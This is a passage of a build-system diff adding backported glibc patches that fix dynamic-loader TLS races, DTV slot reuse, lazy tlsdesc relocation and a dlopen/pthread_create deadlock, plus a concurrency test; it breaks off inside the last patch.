+@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force)
+ /* If we removed any object which uses TLS bump the generation counter. */
+ if (any_tls)
+ {
+- if (__glibc_unlikely (++GL(dl_tls_generation) == 0))
++ size_t newgen = GL(dl_tls_generation) + 1;
++ if (__glibc_unlikely (newgen == 0))
+ _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n");
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+
+ if (tls_free_end == GL(dl_tls_static_used))
+ GL(dl_tls_static_used) = tls_free_start;
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 09f0df7d38..bb79ef00f1 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -387,9 +387,12 @@
+ }
+ }
+
+- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0))
++ size_t newgen = GL(dl_tls_generation) + 1;
++ if (__glibc_unlikely (newgen == 0))
+ _dl_fatal_printf (N_("\
+ TLS generation counter wrapped! Please report this."));
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+
+ /* We need a second pass for static tls data, because
+ _dl_update_slotinfo must not be run while calls to
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 94f3cdbae0..dc69cd984e 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -96,7 +96,9 @@
+ /* No gaps, allocate a new entry. */
+ nogaps:
+
+- result = ++GL(dl_tls_max_dtv_idx);
++ result = GL(dl_tls_max_dtv_idx) + 1;
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+ }
+
+ return result;
+@@ -279,10 +281,12 @@
+ dtv_t *dtv;
+ size_t dtv_length;
+
++ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */
++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
+ /* We allocate a few more elements in the dtv than are needed for the
+ initial set of modules. This should avoid in most cases expansions
+ of the dtv. */
+- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS;
++ dtv_length = max_modid + DTV_SURPLUS;
+ dtv = calloc (dtv_length + 2, sizeof (dtv_t));
+ if (dtv != NULL)
+ {
+@@ -687,7 +691,7 @@
+ if (modid > max_modid)
+ break;
+
+- size_t gen = listp->slotinfo[cnt].gen;
++ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen);
+
+ if (gen > new_gen)
+ /* Not relevant. */
+@@ -699,7 +703,8 @@
+ continue;
+
+ /* If there is no map this means the entry is empty. */
+- struct link_map *map = listp->slotinfo[cnt].map;
++ struct link_map *map
++ = atomic_load_relaxed (&listp->slotinfo[cnt].map);
+ /* Check whether the current dtv array is large enough. */
+ if (dtv[-1].counter < modid)
+ {
+@@ -843,7 +848,12 @@
+ {
+ dtv_t *dtv = THREAD_DTV ();
+
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ /* Update is needed if dtv[0].counter < the generation of the accessed
++ module. The global generation counter is used here as it is easier
++ to check. Synchronization for the relaxed MO access is guaranteed
++ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ return update_get_addr (GET_ADDR_PARAM);
+
+ void *p = dtv[GET_ADDR_MODULE].pointer.val;
+@@ -866,7 +876,10 @@
+ return NULL;
+
+ dtv_t *dtv = THREAD_DTV ();
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ /* This may be called without holding the GL(dl_load_lock). Reading
++ arbitrary gen value is fine since this is best effort code. */
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ {
+ /* This thread's DTV is not completely current,
+ but it might already cover this module. */
+@@ -961,7 +974,9 @@
+ /* Add the information into the slotinfo data structure. */
+ if (do_add)
+ {
+- listp->slotinfo[idx].map = l;
+- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1;
++ /* Can be read concurrently. See _dl_update_slotinfo. */
++ atomic_store_relaxed (&listp->slotinfo[idx].map, l);
++ atomic_store_relaxed (&listp->slotinfo[idx].gen,
++ GL(dl_tls_generation) + 1);
+ }
+ }
+
+diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c
+index 6595f6615b..24ef560b71 100644
+--- a/sysdeps/x86_64/dl-tls.c
++++ b/sysdeps/x86_64/dl-tls.c
+@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS)
+ {
+ dtv_t *dtv = THREAD_DTV ();
+
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ return update_get_addr (GET_ADDR_PARAM);
+
+ return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL);
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
new file mode 100644
index 0000000000..f22e52ea99
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
@@ -0,0 +1,144 @@
+From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Tue, 13 Dec 2016 12:28:41 +0000
+Subject: [PATCH] elf: Add test case for [BZ #19329]
+
+Test concurrent dlopen and pthread_create when the loaded modules have
+TLS. This triggers dl-tls assertion failures more reliably than the
+nptl/tst-stack4 test.
+
+The dlopened module has 100 DT_NEEDED dependencies with TLS; they were
+reused from an existing TLS test. The number of created threads during
+dlopen depends on filesystem speed and hardware, but at most 3 threads
+are alive at a time to limit resource usage.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/Makefile | 9 ++++--
+ elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++
+ elf/tst-tls21mod.c | 1 +
+ 3 files changed, 76 insertions(+), 2 deletions(-)
+ create mode 100644 elf/tst-tls21.c
+ create mode 100644 elf/tst-tls21mod.c
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce]
+Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/Makefile b/elf/Makefile
+index d3e909637a..3241cb6046 100644
+--- a/elf/Makefile
++++ b/elf/Makefile
+@@ -201,7 +201,7 @@
+ tst-unwind-ctor tst-unwind-main tst-audit13 \
+ tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \
+ tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \
+- tst-dlopenfail-2
++ tst-dlopenfail-2 tst-tls21
+ # reldep9
+ tests-internal += loadtest unload unload2 circleload1 \
+ neededtest neededtest2 neededtest3 neededtest4 \
+@@ -312,7 +312,7 @@
+ tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \
+ tst-initlazyfailmod tst-finilazyfailmod \
+ tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \
+- tst-dlopenfailmod3 tst-ldconfig-ld-mod
++ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod
+ # Most modules build with _ISOMAC defined, but those filtered out
+ # depend on internal headers.
+ modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\
+@@ -1697,5 +1697,10 @@
+ $(objpfx)tst-dlopen-nodelete-reloc-mod16.so
+ LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed
+
++# Reuses tst-tls-many-dynamic-modules
++$(objpfx)tst-tls21: $(libdl) $(shared-thread-library)
++$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so
++$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so)
++
+ $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so
+ $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl)
+diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c
+new file mode 100644
+index 0000000000..560bf5813a
+--- /dev/null
++++ b/elf/tst-tls21.c
+@@ -0,0 +1,68 @@
++/* Test concurrent dlopen and pthread_create: BZ 19329.
++ Copyright (C) 2021 Free Software Foundation, Inc.
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <http://www.gnu.org/licenses/>. */
++
++#include <dlfcn.h>
++#include <pthread.h>
++#include <stdio.h>
++#include <stdatomic.h>
++#include <support/xdlfcn.h>
++#include <support/xthread.h>
++
++#define THREADS 10000
++
++static atomic_int done;
++
++static void *
++start (void *a)
++{
++ /* Load a module with many dependencies that each have TLS. */
++ xdlopen ("tst-tls21mod.so", RTLD_LAZY);
++ atomic_store_explicit (&done, 1, memory_order_release);
++ return 0;
++}
++
++static void *
++nop (void *a)
++{
++ return 0;
++}
++
++static int
++do_test (void)
++{
++ pthread_t t1, t2;
++ int i;
++
++ /* Load a module with lots of dependencies and TLS. */
++ t1 = xpthread_create (0, start, 0);
++
++ /* Concurrently create lots of threads until dlopen is observably done. */
++ for (i = 0; i < THREADS; i++)
++ {
++ if (atomic_load_explicit (&done, memory_order_acquire) != 0)
++ break;
++ t2 = xpthread_create (0, nop, 0);
++ xpthread_join (t2);
++ }
++
++ xpthread_join (t1);
++ printf ("threads created during dlopen: %d\n", i);
++ return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c
+new file mode 100644
+index 0000000000..206ece4fb3
+--- /dev/null
++++ b/elf/tst-tls21mod.c
+@@ -0,0 +1 @@
++int __thread x;
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
new file mode 100644
index 0000000000..a87afe3230
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
@@ -0,0 +1,180 @@
+From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001
+From: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+Date: Fri, 25 Jun 2021 10:54:12 -0300
+Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135)
+
+This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2)
+that fixes the _dl_next_tls_modid issues.
+
+The issue with the 572bd547d57a patch is that the DTV entry will only be
+updated in dl_open_worker() with the update_tls_slotinfo() call after
+all dependencies have been processed by _dl_map_object_deps(). However
+_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since
+the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be
+wrongly reused.
+
+This patch fixes this by renaming the _dl_next_tls_modid() function to
+_dl_assign_tls_modid() and by passing the link_map so it can set
+the slotinfo value so that a subsequent _dl_next_tls_modid() call will
+see the entry as allocated.
+
+The intermediary value is cleared up on remove_slotinfo() for the case
+a library fails to load with RTLD_NOW.
+
+This patch fixes BZ #27135.
+
+Checked on x86_64-linux-gnu.
+
+Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com>
+---
+ elf/dl-close.c | 8 +-
+ elf/dl-load.c | 2 +-
+ elf/dl-open.c | 10 --
+ elf/dl-tls.c | 17 +--
+ elf/rtld.c | 2 +-
+ sysdeps/generic/ldsodefs.h | 4 +-
+ 6 files changed, 349 insertions(+), 33 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce]
+Comment: Removed hunks that were related to tests. The hunk from elf/rtld.c is refreshed.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 3720e47dd1..f39001cab9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ object that wasn't fully set up. */
+ if (__glibc_likely (old_map != NULL))
+ {
+- assert (old_map->l_tls_modid == idx);
+-
+ /* Mark the entry as unused. These can be read concurrently. */
+ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
+ GL(dl_tls_generation) + 1);
+@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ /* If this is not the last currently used entry no need to look
+ further. */
+ if (idx != GL(dl_tls_max_dtv_idx))
+- return true;
++ {
++ /* There is an unused dtv entry in the middle. */
++ GL(dl_tls_dtv_gaps) = true;
++ return true;
++ }
+ }
+
+ while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0))
+diff --git a/elf/dl-load.c b/elf/dl-load.c
+index a08df001af..650e4edc35 100644
+--- a/elf/dl-load.c
++++ b/elf/dl-load.c
+@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires");
+ not set up TLS data structures, so don't use them now. */
+ || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL)))
+ /* Assign the next available module ID. */
+- l->l_tls_modid = _dl_next_tls_modid ();
++ _dl_assign_tls_modid (l);
+
+ #ifdef DL_AFTER_LOAD
+ DL_AFTER_LOAD (l);
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index a066f39bd0..d2240d8747 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()"));
+ state if relocation failed, for example. */
+ if (args.map)
+ {
+- /* Maybe some of the modules which were loaded use TLS.
+- Since it will be removed in the following _dl_close call
+- we have to mark the dtv array as having gaps to fill the
+- holes. This is a pessimistic assumption which won't hurt
+- if not true. There is no need to do this when we are
+- loading the auditing DSOs since TLS has not yet been set
+- up. */
+- if ((mode & __RTLD_AUDIT) == 0)
+- GL(dl_tls_dtv_gaps) = true;
+-
+ _dl_close_worker (args.map, true);
+
+ /* All l_nodelete_pending objects should have been deleted
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 2b5161d10a..423e380f7c 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -126,8 +126,8 @@ oom (void)
+ }
+
+
+-size_t
+-_dl_next_tls_modid (void)
++void
++_dl_assign_tls_modid (struct link_map *l)
+ {
+ size_t result;
+
+@@ -157,7 +157,11 @@ _dl_next_tls_modid (void)
+ }
+
+ if (result - disp < runp->len)
+- break;
++ {
++ /* Mark the entry as used, so any dependency see it. */
++ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l);
++ break;
++ }
+
+ disp += runp->len;
+ }
+@@ -184,17 +188,14 @@ _dl_next_tls_modid (void)
+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+ }
+
+- return result;
++ l->l_tls_modid = result;
+ }
+
+
+ size_t
+ _dl_count_modids (void)
+ {
+- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where
+- we fail to load a module and unload it leaving a gap. If we don't
+- have gaps then the number of modids is the current maximum so
+- return that. */
++ /* The count is the max unless dlclose or failed dlopen created gaps. */
+ if (__glibc_likely (!GL(dl_tls_dtv_gaps)))
+ return GL(dl_tls_max_dtv_idx);
+
+diff --git a/elf/rtld.c b/elf/rtld.c
+index e3fb2a5b2a..d733359eaf 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -1612,7 +1612,7 @@
+ /* Add the dynamic linker to the TLS list if it also uses TLS. */
+ if (GL(dl_rtld_map).l_tls_blocksize != 0)
+ /* Assign a module ID. Do this before loading any audit modules. */
+- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid ();
++ _dl_assign_tls_modid (&GL(dl_rtld_map));
+
+ /* If we have auditing DSOs to load, do it now. */
+ bool need_security_init = true;
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index 176394de4d..9c15259236 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr,
+ extern void _dl_sysdep_start_cleanup (void) attribute_hidden;
+
+
+-/* Determine next available module ID. */
+-extern size_t _dl_next_tls_modid (void) attribute_hidden;
++/* Determine next available module ID and set the L l_tls_modid. */
++extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden;
+
+ /* Count the modules with TLS segments. */
+ extern size_t _dl_count_modids (void) attribute_hidden;
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..899111b118
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,56 @@
+From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:29:23 +0000
+Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This is similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to
+relocate tlsdesc lazily, but that does not work in a BIND_NOW module
+due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at
+load time fixes this bug 27721 too.
+---
+ sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h
+index 103eee6c3f..9a876a371e 100644
+--- a/sysdeps/x86_64/dl-machine.h
++++ b/sysdeps/x86_64/dl-machine.h
+@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map,
+ }
+ else if (__glibc_likely (r_type == R_X86_64_TLSDESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++ const ElfW (Sym) *sym = &symtab[symndx];
++ const struct r_found_version *version = NULL;
+
+- td->arg = (void*)reloc;
+- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)])
+- + map->l_addr);
++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++ {
++ const ElfW (Half) *vernum =
++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ version = &map->l_versions[vernum[symndx] & 0x7fff];
++ }
++
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+ }
+ else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE))
+ {
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..ad0a1147aa
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,124 @@
+From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:40:11 +0000
+Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This is similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+On i386 the code is a bit more complicated than on x86_64 because both
+rel and rela relocs are supported.
+---
+ sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++---------------------
+ 1 file changed, 34 insertions(+), 42 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h
+index 23e9cc3bfb..590b41d8d7 100644
+--- a/sysdeps/i386/dl-machine.h
++++ b/sysdeps/i386/dl-machine.h
+@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map,
+ }
+ else if (__glibc_likely (r_type == R_386_TLS_DESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
+-
+- /* Handle relocations that reference the local *ABS* in a simple
+- way, so as to preserve a potential addend. */
+- if (ELF32_R_SYM (reloc->r_info) == 0)
+- td->entry = _dl_tlsdesc_resolve_abs_plus_addend;
+- /* Given a known-zero addend, we can store a pointer to the
+- reloc in the arg position. */
+- else if (td->arg == 0)
+- {
+- td->arg = (void*)reloc;
+- td->entry = _dl_tlsdesc_resolve_rel;
+- }
+- else
+- {
+- /* We could handle non-*ABS* relocations with non-zero addends
+- by allocating dynamically an arg to hold a pointer to the
+- reloc, but that sounds pointless. */
+- const Elf32_Rel *const r = reloc;
+- /* The code below was borrowed from elf_dynamic_do_rel(). */
+- const ElfW(Sym) *const symtab =
+- (const void *) D_PTR (map, l_info[DT_SYMTAB]);
++ const Elf32_Rel *const r = reloc;
++ /* The code below was borrowed from elf_dynamic_do_rel(). */
++ const ElfW(Sym) *const symtab =
++ (const void *) D_PTR (map, l_info[DT_SYMTAB]);
+
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
+ # ifdef RTLD_BOOTSTRAP
+- /* The dynamic linker always uses versioning. */
+- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
++ /* The dynamic linker always uses versioning. */
++ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
+ # else
+- if (map->l_info[VERSYMIDX (DT_VERSYM)])
++ if (map->l_info[VERSYMIDX (DT_VERSYM)])
+ # endif
+- {
+- const ElfW(Half) *const version =
+- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
+- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
+- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
+- &map->l_versions[ndx],
+- (void *) (l_addr + r->r_offset), skip_ifunc);
+- }
++ {
++ const ElfW(Half) *const version =
++ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
++ &map->l_versions[ndx],
++ (void *) (l_addr + r->r_offset), skip_ifunc);
++ }
+ # ifndef RTLD_BOOTSTRAP
+- else
+- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
+- (void *) (l_addr + r->r_offset), skip_ifunc);
++ else
++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
++ (void *) (l_addr + r->r_offset), skip_ifunc);
+ # endif
+- }
+ }
+ else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+ {
+@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map,
+ ;
+ else if (__glibc_likely (r_type == R_386_TLS_DESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++ const ElfW (Sym) *sym = &symtab[symndx];
++ const struct r_found_version *version = NULL;
++
++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++ {
++ const ElfW (Half) *vernum =
++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ version = &map->l_versions[vernum[symndx] & 0x7fff];
++ }
+
+- td->arg = (void*)reloc;
+- td->entry = _dl_tlsdesc_resolve_rela;
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+ }
+ else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+ {
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
new file mode 100644
index 0000000000..7a10131bad
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
@@ -0,0 +1,276 @@
+From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 15 Sep 2021 15:16:19 +0100
+Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ
+ #28357]
+
+The fix for bug 19329 caused a regression such that pthread_create can
+deadlock when concurrent ctors from dlopen are waiting for it to finish.
+Use a new GL(dl_load_tls_lock) in pthread_create that is not taken
+around ctors in dlopen.
+
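+An editorial sketch (not the upstream test) of the deadlock shape: a
+constructor that runs under dlopen waits for another thread whose
+pthread_create call, before this fix, blocked on the very lock dlopen holds
+around constructors. The helper names below are illustrative only:
+
+  #include <pthread.h>
+  #include <stdatomic.h>
+
+  static _Atomic int created;
+
+  static void *nop (void *a) { return a; }
+
+  /* Constructor of a dlopen'ed module: runs while dlopen holds its lock.  */
+  void ctor_body (void)
+  {
+    while (!atomic_load (&created))
+      ;                             /* waits for creator() below */
+  }
+
+  /* Runs concurrently in another thread.  */
+  void *creator (void *unused)
+  {
+    pthread_t t;
+    /* Blocked on the dlopen lock before the fix, so 'created' is never set.  */
+    pthread_create (&t, NULL, nop, NULL);
+    atomic_store (&created, 1);
+    pthread_join (t, NULL);
+    return NULL;
+  }
+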
+The new lock is also used in __tls_get_addr instead of GL(dl_load_lock).
+
+The new lock is held in _dl_open_worker and _dl_close_worker around
+most of the logic before/after the init/fini routines. When init/fini
+routines are running then TLS is in a consistent, usable state.
+In _dl_open_worker the new lock requires catching and reraising dlopen
+failures that happen in the critical section.
+
+The new lock is reinitialized in a fork child, to keep the existing
+behaviour and it is kept recursive in case malloc interposition or TLS
+access from signal handlers can retake it. It is not obvious if this
+is necessary or helps, but avoids changing the preexisting behaviour.
+
+The new lock may be more appropriate for dl_iterate_phdr too than
+GL(dl_load_write_lock), since TLS state of an incompletely loaded
+module may be accessed. If the new lock can replace the old one,
+that can be a separate change.
+
+Fixes bug 28357.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c | 6 ++
+ elf/dl-open.c | 35 ++++++++-
+ elf/dl-support.c | 7 ++
+ elf/dl-tls.c | 16 ++---
+ elf/rtld.c | 1 +
+ sysdeps/nptl/fork.c | 3 +
+ sysdeps/generic/ldsodefs.h | 9 ++-
+ 10 files changed, 235 insertions(+), 12 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5]
+Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple source files were shuffled, so this patch was updated as per the code present in glibc 2.31. The test case was removed.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 93ff5c96e9..cfe0f1c0c9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -551,6 +551,9 @@
